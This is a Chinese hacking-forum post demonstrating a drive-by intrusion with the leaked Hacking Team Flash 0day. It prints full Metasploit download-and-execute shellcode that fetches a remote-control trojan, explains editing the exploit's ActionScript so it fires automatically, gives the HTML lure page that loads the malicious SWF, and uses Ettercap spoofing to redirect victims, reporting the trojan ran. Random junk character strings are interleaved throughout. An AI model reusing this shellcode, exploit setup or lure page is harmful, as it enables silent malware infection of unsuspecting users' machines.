找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1368|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

( z n* W2 [* a/ R/ q 三、flash 0day之手工代码修改制作下载者实例入侵演示 ( l( Z. I" O( v! C) |/ \8 i

' w3 U( h% O T( T9 @! y

4 c3 ]5 Y1 V1 {4 ~ 利用到的工具: , k e$ [0 P8 O. Z8 C3 a5 F

) X6 }* L( ~; W

- j( D6 i1 G' b8 l( _/ [% J Msf * k- [* N+ L8 T7 ^; `( ?

7 u" T( C2 V h. T8 ]7 p" Y

' x6 H5 D* U( v1 \ Ettercap " A' U2 }+ m$ U0 x2 l/ }2 r

( k( w$ |/ |2 W" }2 n3 s5 I

& @; i$ r$ O2 t* W3 X Adobe Flash CS6 ( D) v: n1 e/ K0 G3 D2 [" r) N

# ?$ V) F. m6 H, {0 g

8 _3 G5 C3 b9 K0 b) y2 J _+ J Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 5 a; O/ |; U7 d% b, I$ |8 k7 @; q8 W

* K4 M4 R3 H! W/ Q m0 u- z

/ o7 X m7 X; N. K# u 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options " y* t7 U4 O+ w" w

: `6 S3 h( [/ C) L" A+ f

& s& b. A/ i8 q' \- b5 U0 u) ` 如图: 5 n$ Z9 ?7 F5 K

2 t7 Y. e7 L" K2 T

- j: \) X; D' k8 O+ V9 I/ e" B   3 E0 r2 I* S+ v c

2 ^" s& u$ Q/ j3 s3 d5 _& b

" L( x: |# l* W' s) W, c) ?   - t) h- B- x3 H6 @+ X, M; m

; e3 h2 |) o! Q% v* w

) [: n0 u. o. y 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 0 [' }$ v$ K- P, C y. g& y

; i9 L' d7 l; U5 H

7 _9 [' n2 F0 R0 O9 h. c   ! D: J0 D2 S4 k$ v

& c2 I5 r& s1 Z: `* [; L7 r9 d

% o9 l" D1 k' z5 j* R; Z* _   , a9 H& |' `+ s, }6 p1 y3 S+ l6 N& [

/ u8 E4 D8 p1 ~" }

! J* O% G- A+ y3 O# U- K 然后执行generate -t dword生成shellcode,如下: " d% q' D8 N) d# u# f. |+ A5 T

5 G6 ^6 Q! i. g1 f3 R

( m. V8 ?! E- [4 v% ?- f# C8 L   4 B5 A- T% v. ^ F

# @" l4 r8 l" j* R* |5 c h8 b, m

$ C5 } e, }, p9 X 复制代码到文本下便于我们一会编辑flash exp,如下: , j- B$ S8 _/ W' G; G* w( B6 E

! Y& e& @7 o/ i8 |$ d* o T! L

: l& k! w" q) P. N 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, v- b; {! _7 g* d9 ^. A6 `

# u/ f% k7 t' A; ^( b% V G1 |

; ]/ p9 s( `$ Z 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, " {/ a/ Q2 U( q" W' ^ s8 X8 L

- ~- t2 X" Q$ |

]& t$ M4 G& z 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 3 t9 J1 I1 Q2 X0 ]! b

1 {4 r; X3 Q6 T; F5 o1 m+ @

( q% j1 h$ k4 {# _3 y$ X# s6 F' M 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 7 K3 G, k. Q6 c; m( M/ r

# \+ R( e3 W% b$ x6 G0 K2 z

- ~3 Q: r0 t+ ~9 D! i 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, / R4 }1 E+ G( g+ f$ _, h& i

! e" ], L7 C* a) @, X

' W, O$ {( V, @( y 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, & m" U' v: `: C' S G6 C0 T' b

* B% q J* ?+ `; q3 G6 N9 _+ e

: ^1 S3 c1 p" H# ~ 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, ; h; a) q8 n. Z: P3 @

0 E9 L0 r0 T: o) j0 r2 j h

7 G3 T" Q: ], }9 E. n 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 4 H2 P4 C, U% M7 E( [% z- G

, h- D4 Q$ k. @- a9 f

- n, {& t! b. C1 s2 L 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, ; r3 K' g0 ?, b& m% \# \9 b0 Z

' J; x4 O) d5 o) i

7 S. o* q; e% ~/ W 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, ' V0 s$ a* _3 n. U- C

- D0 r2 a9 }. }: ?5 K6 Z" c6 S% ^

# O, k; Q7 s! c2 { 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 6 k2 @! y* v0 x$ z2 H# o4 e3 q {

+ W: Y$ Q, V* K( W: j; g

) y6 E4 O& A. D Z7 f: w. o1 J 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, ) X' W' _0 M& g1 G. ~+ q1 Q4 f

# F! J. L. x' _2 I2 c e8 d

6 ]) \9 S) {9 W 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, Q; G- i% j# w

6 w! V: I; q. f) t

; O. A4 Q5 B3 m7 ?) I$ y 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 ! g3 H8 `9 l8 Z* z. n# @7 m0 _, G

+ S' G6 A! K! o- v

2 M. _ t+ u% K( i: I   0 f; [6 ^8 ?4 m

4 y1 C. M0 z" v$ G5 {- W5 S7 k! N

* F% M! J: a( u, c   3 ?/ c" ~( ]; B, M; h- P8 u5 K: O

) |5 A. U1 Z6 w( c

5 I. a5 |/ p/ o# ^9 Q 下面我们来修改flash 0day exp,需要修改三个文件,分别为: 0 D: ], G( t+ g8 a0 @3 c; J8 N

5 J ^3 R k- `7 p& d) k

5 G' J3 {/ `' {6 S   . E* u J6 S8 w4 ?2 E

1 q& q: T9 I/ _2 q$ M. G1 g" Q

, \+ h2 \& c. a: f7 X% f# H 先修改ShellWin32.as,部分源代码如图: & |5 ]- y f+ O/ h2 R) l; R

1 ?& R3 X# ~- r. {3 q

$ n0 N6 Q7 y' Q$ M   ! J9 ^% c- F/ T5 ]; S/ u

! b. ?5 u. M7 U5 i. Q

' {- K# P0 u8 Q$ B2 m 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 5 V B: J% f; n- _7 j/ L

2 A' p2 I$ U* _1 ^5 }: e) r

9 }, G0 N2 \0 H9 s, O/ U   $ j) O9 Z6 Q8 H, y$ X! m3 w* q) [! U

3 l8 V0 X6 v6 u# s- H, u6 J

" U4 F7 z0 o# v% T- N' _ 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: - w5 m) y6 i' z7 ]7 O+ D y& \

6 e$ ~2 i1 d8 } l: ?1 @, M. c# ~

/ y& _* Y* m, d5 T4 s! L6 g   1 m# V' v. b+ o8 e, \$ n, b r

/ H* ~/ l, }3 ]5 P! z

, P! I- H0 \8 c# P$ p( _ 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 7 }( k' `* Z6 W7 F0 Z) T

* U3 w. T: N1 A

( Z6 k9 A) W/ v   / f: F: s @* F" g( f; A( b

+ N& m. Z6 }7 y$ w7 ?

% y& E/ A$ S6 p2 o+ K! v2 a! y   % y! K" Z$ F9 V+ b$ }4 C

1 ?- ?9 i# M3 x3 x" w0 F

9 I0 @; Z E2 D   & f) K- K- q; }" E

6 D Z. v, l" K3 m- H

! |3 j& v4 T# t& G( O! m( P 然后点保存,下面我们来编译一下,打开 * S# m9 b; t" B4 I# F* H0 a

9 F# M& H! r1 F& V1 z

2 ]# n9 x8 I& S$ {8 Y exp1.fla然后点文件-发布,看看编译没错误 & y* n5 c* b$ w# Z' L

2 Y+ {) _ A2 V S. F% o

: H) a+ e/ A8 ~% V6 m# s% P7 L   2 B# n4 v9 H/ f/ M2 m

6 a R/ V+ S2 T* m3 O* E

% r; Q+ i- X l   ! ^0 v. r! V5 h; y$ g& f" K

l! l0 G4 c8 M C) S

3 q) D+ B1 Q/ c, B( N8 T2 r9 Z' k   6 Q* [4 V N! d; H+ y7 k4 {

1 J5 U h+ p: r: z8 S+ D

( t& n2 d; G4 f" }4 |: k8 H   " s/ F' I4 j) ]9 \7 ?5 m1 e/ k

. W% i6 l1 T' I, W

" ^2 v) I; `4 x3 _5 D0 [ 然后我们把生成的 8 \$ E8 W {9 M

# P' L& C& w( T( ~: P

5 o( H! J6 x. n' F exp1.swf丢到kailinux /var/www/html下: , V* l* X$ |6 j

! s4 r0 R" d) B4 U8 C

$ S- R( {4 b* g5 y: z/ f4 n 然后把这段代码好好编辑一下 $ o0 [( C% V' @$ M& L2 c/ m7 l

- x8 v0 O# |; |2 S: ?; K& A

8 n, T. W: S+ m$ Q4 l' @   # w4 A# h8 H+ i

1 m( W) V! q& S8 K

; R$ `; X& y0 b2 z7 c$ ]% J& f   . e n4 I- R$ x6 r1 W& g2 u

0 D' A3 z+ ] e: J4 K

- ~/ h; j- R& C! N% H A3 v   , G- K/ J8 V: w" A7 l

6 k9 `% D7 m5 ?0 t

! Z# @/ e2 C% j! Z* g' V- h   . J6 m' m% p% V5 j& w

" q; Z& G7 W+ E' s) q. `: x% p

: D1 ?/ _# {2 u2 X   0 G' o# H6 b; V o: g% c0 u

( S+ Z/ J% s4 e5 j- ]

! m: x' i/ ]7 z$ A. B   % V" @- k3 K& } N

9 W; l1 s# ]- a4 ?" r# C

8 f7 _$ P* l+ i <!DOCTYPE html> ; n9 b5 {7 d- P [

& c1 G0 m7 ~" I" M8 G, T( R" ]

% H/ c6 q8 o! m/ e- n' H <html> : z; }- X' f8 L4 F

^) Y2 L4 X& q, M

' }% B {& O7 C. ~2 X <head> " B& P7 W$ Y! d9 O, R! U+ u

; T: Y* y X' U# y% Y4 ?$ p6 p9 \

$ n$ h' M: K6 r) {5 I X8 W <meta http-equiv="Content-Type" content="text/html; * G6 u$ F8 w/ f+ x! l% N

8 a) A0 @' S+ M; t

( B: y4 M, T _3 f8 n charset=utf-8"/> 2 @: }! d& ?7 q4 ]* I. t$ ^

$ i2 w/ Z- I) A' s$ [1 E0 u

* y5 u# P( l% j$ {. i& N; W </head> Z$ f7 k- R* h2 X+ u

* W8 X8 j) T5 Z% i2 \% O

0 G' |3 k& Z6 Q4 q& [4 e <body> # P7 t/ h3 w6 p

3 K$ d# A) c# V4 M; @4 w

$ n6 }, L2 u p5 H1 J <h2> Please wait, the requested page is loading...</h2> $ c( ?8 L) r0 R* s

! K2 G* d$ Q+ h2 I3 @# u' K$ x* T

2 U f3 n- ^% Z, h" g" f6 K* x6 |9 L4 e <br> 4 H; G+ t" t7 E* w9 }9 ^

( V0 s+ [- d ` M" l+ b* P- w

: A" C! _, ?8 m, G. a* t+ V <OBJECT D. f: j( ?. Q* N1 o1 R

3 _- o1 W$ E- v2 j1 H, v

* G* t8 ?6 t$ Q0 n4 w classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie 7 U$ i. N* y! v

+ {( P; @, h: x$ u6 x8 i& e& Z( A

* g* x( O8 y2 e# a, E VALUE="http://192.168.0.109/exp1.swf"></OBJECT> : n: t, ]' V+ |+ R; N" K

5 h9 X, h% d6 `: P4 @& s

& G. z6 d) F) x% l& s8 D </body> 8 C! C9 \8 E M, X! V' f

4 [" k( ~6 X# l) P+ u: k$ @1 p

7 e* F6 d2 b2 }' {( V# Q6 b <script> ( _6 C4 z9 g! a

: r8 C2 y5 |6 j: i! v$ x# m/ H

A+ ]& k9 u& ]# B3 R1 f     setTimeout(function () { & W' |1 s7 e* d1 X" R# ]3 X

& D$ a1 w% x* G8 G: b) y7 p" k" m4 |

' ~. V0 z7 G! v9 ?1 i! Q          " P8 V6 u6 p% M4 i7 M

- A. ^7 x' A; c( _9 o+ z$ ^6 ], F

0 _8 M# G+ Z; ]8 A9 m5 r* E, G window.location.reload(); : q/ j0 W* C5 H1 n# |; C/ r

" u: ~. t- P5 Z5 q- v9 @, T- d) _

( ?0 W# J. R& U. ?4 [     }, 10000); $ H' H3 `8 x* k: [ \4 _# ] m' w/ t# D

) z" G' @6 A! N9 e) t0 g

4 t$ f3 l$ t# G9 D$ k) I7 q" Q7 Y   8 H% ]1 w1 q7 e

( l+ K. i! S/ [$ o" w! B' `

9 V3 e" R2 {- d, p b- p; o5 p </script> ) T. W1 c( n* j

6 {% L& y% `' p4 E5 A y

" K% a' T, v: @3 e5 ? </html> % m4 P N" }3 z, P$ U

, s! C/ [) ~" s4 N

+ @% v) z7 l) w   " b* l$ |; u2 ]" V

: f7 u2 g/ a, k+ a3 I7 ], h* r+ X

5 A9 L7 ~! t, K R3 E% ] 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 4 b3 }- B& q" |$ O

4 j6 S& \9 w' L

0 p, ?+ a8 ~4 n0 g0 a! R: {   % g7 I$ j0 n( v8 U; J, `+ S/ Q; a" V

- V6 `. M/ L& Y5 A

, K U. d4 j9 k2 G" }; Q   ; [* Y& D* m2 x6 b

, n, ^, F5 R( E

9 V+ o4 Z% I- U8 y" [7 i. T5 K   . _! `0 d# Y0 o n: V/ g0 g! G8 _

6 O" f2 ~$ l+ z* r; T$ `

8 ?% d$ \' B! c8 `9 g: M   5 E/ F- Z' N% ]& O! N

* _. {+ P$ b9 [

( O( m8 B6 n. D2 w0 o   7 b5 ~! a% J: i6 F5 ?: U* i8 j2 C

1 R; ]4 `4 W* n# F4 } ^1 b x

( A7 P, _2 v4 r. G( `7 {4 s 下面我们用ettercap欺骗如图: % _; G2 ~( L( c0 H% Q* G2 C

" z L7 k% G9 y8 D+ Q) C

) z) t2 I" a/ f2 `   : k. K! {3 G0 l) j

0 ?0 O$ S$ C9 d5 E- Y7 r

2 N- m/ ^# w: d1 W! Q& K   6 ^$ B# j: e2 [1 r9 S8 x; d

4 C l( f/ j9 l. l

# {% s* ~8 W0 s 下面我们随便访问个网站看看: & h! H0 Y: v L# l# N1 L$ K

! y& O) D2 {4 X9 x% b: U3 R

0 f- ?/ W( b; a- @( h3 B+ c 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 6 }! j C, [7 r+ O5 Z

! b1 H, L3 G5 v0 {7 C" X

% e* c9 ^5 l% M( W8 y% k U8 y8 g7 E   X) I* l! v/ l. ]

6 g0 r3 k" `; K9 j9 B/ ]: K

$ U4 |4 U% r8 L7 x! B6 u) W 我们看另一台, ' a* L+ y6 B3 r% T' `' }- t3 @

4 t1 R* k6 E4 {1 `. m) O

9 j. X2 f8 z8 A# ^* l 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 9 v2 w) n5 a) J2 C) A Z. N

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表